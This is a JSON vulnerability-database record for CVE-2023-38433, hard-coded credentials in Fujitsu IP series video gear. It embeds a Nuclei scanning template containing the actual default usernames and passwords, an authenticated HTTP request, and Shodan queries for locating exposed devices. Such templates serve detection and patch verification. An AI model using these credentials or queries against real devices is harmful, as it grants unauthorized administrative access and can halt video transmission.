{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-38433/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-38433/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-38433/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-38433/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-38433/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-38433"},"sightings":{"href":"/api/v1/sightings/cve-2023-38433"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-38433.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-38433\n\ninfo:\n  name: Fujitsu IP Series - Hardcoded Credentials\n  author: AdnaneKhan\n  severity: high\n  description: |\n    Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network.\n  reference:\n    - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-38433\n    - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01\n    - https://www.fujitsu.com/global/products/computing/peripheral/video/download\n    - https://jvn.jp/en/jp/JVN95727578\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n    cvss-score: 7.5\n    cve-id: CVE-2023-38433\n    cwe-id: CWE-798\n    epss-score: 0.03722\n    epss-percentile: 0.89371\n    cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: fujitsu\n    product: ip-he950e_firmware\n    shodan-query:\n      - '\"Server: thttpd/2.25b 29dec2003\" content-length:1133'\n      - '\"server: thttpd/2.25b 29dec2003\" content-length:1133'\n    max-req: 1\n  tags: cve2023,cve,fujitsu,ip-series,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /b_download/index.html HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(username + ':' + password)}}\n\n    attack: pitchfork\n    payloads:\n      username:\n        - fedish264pro\n        - fedish265pro\n      password:\n        - h264pro@broadsight\n        - h265pro@broadsight\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'Field Support'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e5417d7fc583691a6368831d9d2658b151dd31c65c0b32248f81ce6dc2830e6e022026e136d357004f31dabf8d0e3c85fc00f3a31fdb7c4bb0892996ccda793d4bfe:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-38433"}